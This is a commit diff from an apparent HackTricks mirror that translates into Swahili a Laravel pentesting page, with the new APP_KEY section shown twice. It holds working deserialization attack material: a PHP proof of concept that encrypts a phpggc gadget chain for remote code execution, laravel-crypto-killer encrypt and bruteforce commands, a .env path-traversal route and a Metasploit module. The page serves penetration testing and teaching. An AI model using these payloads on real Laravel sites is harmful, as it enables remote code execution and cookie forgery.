maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-web/laravel.md']

Browse Source
This commit is contained in:
Translator 2025-07-10 12:38:58 +00:00
parent 77fcb9ec72
commit 3a27af93ed
1 changed files with 175 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

183
src/network-services-pentesting/pentesting-web/laravel.md
View File

@ -1,13 +1,98 @@
# Laravel
{{#include /banners/hacktricks-training.md}}
### Laravel SQLInjection
Soma habari kuhusu hii hapa: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
---
## APP_KEY & Encryption internals (Laravel \u003e=5.6)
Laravel inatumia AES-256-CBC (au GCM) na HMAC integrity chini ya uso (`Illuminate\\Encryption\\Encrypter`).
Ciphertext safi ambayo hatimaye **inatumwa kwa mteja** ni **Base64 ya kitu cha JSON** kama:
```json
{
"iv" : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac" : "HMAC_SHA256(iv||value, APP_KEY)",
"tag" : "" // only used for AEAD ciphers (GCM)
}
```
`encrypt($value, $serialize=true)` itafanya `serialize()` maandiko ya wazi kwa chaguo-msingi, wakati `decrypt($payload, $unserialize=true)` **ita `unserialize()`** thamani iliyokolewa. Hivyo basi **mshambuliaji yeyote anayejua siri ya byte 32 `APP_KEY` anaweza kuunda kitu kilichohifadhiwa cha PHP kilichosimbwa na kupata RCE kupitia mbinu za kichawi (`__wakeup`, `__destruct`, …)**.
Minimal PoC (framework ≥9.x):
```php
use Illuminate\Support\Facades\Crypt;
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
```
Ingiza string iliyozalishwa kwenye chochote kilichovuja `decrypt()` sink (paramu ya njia, cookie, kikao, …).
---
## laravel-crypto-killer 🧨
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) inafanya mchakato mzima kuwa wa kiotomatiki na kuongeza hali rahisi ya **bruteforce**:
```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```
The script inasaidia kwa uwazi payloads za CBC na GCM na inazalisha tena uwanja wa HMAC/tag.
---
## Mifano halisi ya udhaifu
| Mradi | Kitu kilichoharibika | Mnyororo wa gadget |
|-------|----------------------|--------------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie wakati `Passport::withCookieSerialization()` imewezeshwa | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session` cookie | Laravel/RCE15 |
Mchakato wa unyakuzi daima ni:
1. Pata `APP_KEY` (mfano wa chaguo-msingi, kuvuja kwa Git, kuvuja kwa config/.env, au brute-force)
2. Zalisha gadget na **PHPGGC**
3. `laravel_crypto_killer.py encrypt …`
4. Toa payload kupitia parameter/cookie iliyoathirika → **RCE**
---
## Ugunduzi wa wingi wa APP_KEY kupitia brute-force ya cookie
Kwa sababu kila jibu jipya la Laravel linaweka angalau cookie 1 iliyosimbwa (`XSRF-TOKEN` na kawaida `laravel_session`), **scanner za umma za mtandao (Shodan, Censys, …) zinavuja mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa bila mtandao.
Matokeo muhimu ya utafiti uliochapishwa na Synacktiv (2024-2025):
* Dataset Julai 2024 » 580 k tokens, **3.99 % funguo zimevunjwa** (≈23 k)
* Dataset Mei 2025 » 625 k tokens, **3.56 % funguo zimevunjwa**
* >1 000 seva bado zina udhaifu kwa CVE-2018-15133 ya zamani kwa sababu tokens moja kwa moja zina data iliyosimbwa.
* Matumizi makubwa ya funguo Top-10 APP_KEYs zimeandikwa kwa chaguo-msingi ambazo zimesambazwa na templeti za kibiashara za Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
Zana ya kibinafsi ya Go **nounours** inasukuma throughput ya AES-CBC/GCM bruteforce hadi ~1.5 bilioni majaribio/s, ikipunguza uvunjaji wa dataset kamili kuwa <2 dakika.
---
## Marejeleo
* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
{{#include ../../banners/hacktricks-training.md}}
## Laravel Tricks
## Hila za Laravel
### Debugging mode
### Hali ya upelelezi
Ikiwa Laravel iko katika **debugging mode** utaweza kufikia **code** na **data nyeti**.\
Ikiwa Laravel iko katika **hali ya upelelezi** utaweza kufikia **kod** na **data nyeti**.\
Kwa mfano `http://127.0.0.1:8000/profiles`:
![](<../../images/image (1046).png>)
@ -16,13 +101,13 @@ Hii kwa kawaida inahitajika kwa ajili ya kutumia CVEs nyingine za Laravel RCE.
### .env
Laravel huhifadhi APP inayotumiwa kuandika siri za kuki na akreditivu zingine ndani ya faili inayoitwa `.env` ambayo inaweza kufikiwa kwa kutumia njia fulani ya kupita: `/../.env`
Laravel huhifadhi APP inayotumia kusimbua cookies na akreditif nyingine ndani ya faili inayoitwa `.env` ambayo inaweza kufikiwa kwa kutumia baadhi ya njia za kupita: `/../.env`
Laravel pia itaonyesha habari hii ndani ya ukurasa wa debug (ambao unaonekana wakati Laravel inapata kosa na umewezeshwa).
Laravel pia itaonyesha habari hii ndani ya ukurasa wa upelelezi (ambao unaonekana wakati Laravel inapata kosa na umewezeshwa).
Kwa kutumia APP_KEY ya siri ya Laravel unaweza kufungua na kuandika tena kuki:
Kwa kutumia APP_KEY ya siri ya Laravel unaweza kusimbua na kusimbua tena cookies:
### Decrypt Cookie
### Futa Cookie
```python
import os
import json
@ -88,7 +173,7 @@ Toleo lenye udhaifu: 5.5.40 na 5.6.x kupitia 5.6.29 ([https://www.cvedetails.com
Hapa unaweza kupata taarifa kuhusu udhaifu wa deserialization hapa: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
Unaweza kujaribu na kutumia kwa kutumia [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Au unaweza pia kutumia kwa metasploit: `use unix/http/laravel_token_unserialize_exec`
Au unaweza pia kutumia metasploit: `use unix/http/laravel_token_unserialize_exec`
### CVE-2021-3129
@ -98,5 +183,87 @@ Deserialization nyingine: [https://github.com/ambionics/laravel-exploits](https:
Soma taarifa kuhusu hii hapa: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
### Laravel SQLInjection
Soma taarifa kuhusu hii hapa: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
---
## APP_KEY & Encryption internals (Laravel \u003e=5.6)
Laravel inatumia AES-256-CBC (au GCM) na HMAC integrity chini ya uso (`Illuminate\\Encryption\\Encrypter`).
Ciphertext safi ambayo hatimaye **inatumwa kwa mteja** ni **Base64 ya kitu cha JSON** kama:
```json
{
"iv" : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac" : "HMAC_SHA256(iv||value, APP_KEY)",
"tag" : "" // only used for AEAD ciphers (GCM)
}
```
`encrypt($value, $serialize=true)` itafanya `serialize()` maandiko ya wazi kwa chaguo-msingi, wakati `decrypt($payload, $unserialize=true)` **ita `unserialize()`** thamani iliyokolewa kiotomatiki. Hivyo basi **mshambuliaji yeyote anayejua siri ya byte 32 `APP_KEY` anaweza kuunda kitu kilichohifadhiwa cha PHP kilichosimbwa na kupata RCE kupitia mbinu za kichawi (`__wakeup`, `__destruct`, …)**.
Minimal PoC (framework ≥9.x):
```php
use Illuminate\Support\Facades\Crypt;
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
```
Ingiza mfuatano uliozalishwa kwenye chochote kilicho hatarini `decrypt()` sink (paramu ya njia, cookie, kikao, …).
---
## laravel-crypto-killer 🧨
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) inaweka mchakato mzima kuwa otomatiki na kuongeza hali rahisi ya **bruteforce**:
```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```
The script inasaidia kwa uwazi payloads za CBC na GCM na inazalisha tena uwanja wa HMAC/tag.
---
## Mifano halisi ya udhaifu
| Mradi | Kitu kilichoharibika | Mnyororo wa gadget |
|-------|----------------------|--------------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie wakati `Passport::withCookieSerialization()` imewezeshwa | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session` cookie | Laravel/RCE15 |
Mchakato wa unyakuzi daima ni:
1. Pata `APP_KEY` (mfano wa chaguo-msingi, uvujaji wa Git, uvujaji wa config/.env, au brute-force)
2. Zalisha gadget na **PHPGGC**
3. `laravel_crypto_killer.py encrypt …`
4. Toa payload kupitia parameter/cookie iliyo hatarini → **RCE**
---
## Ugunduzi wa wingi wa APP_KEY kupitia brute-force ya cookie
Kwa sababu kila jibu jipya la Laravel linaweka angalau cookie 1 iliyosimbwa (`XSRF-TOKEN` na kawaida `laravel_session`), **scanner za umma za mtandao (Shodan, Censys, …) zinavuja mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa bila mtandao.
Matokeo muhimu ya utafiti uliochapishwa na Synacktiv (2024-2025):
* Dataset Julai 2024 » 580 k tokens, **3.99 % funguo zimevunjwa** (≈23 k)
* Dataset Mei 2025 » 625 k tokens, **3.56 % funguo zimevunjwa**
* >1 000 seva bado zina udhaifu kwa CVE-2018-15133 ya zamani kwa sababu tokens moja kwa moja zina data iliyosimbwa.
* Matumizi makubwa ya funguo Top-10 APP_KEYs zimeandikwa kwa chaguo-msingi ambazo zimesambazwa na templeti za kibiashara za Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
Zana ya kibinafsi ya Go **nounours** inasukuma throughput ya AES-CBC/GCM bruteforce hadi ~1.5 bilioni majaribio/s, ikipunguza uvunjaji wa dataset kamili hadi <2 dakika.
---
## Marejeleo
* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
{{#include ../../banners/hacktricks-training.md}}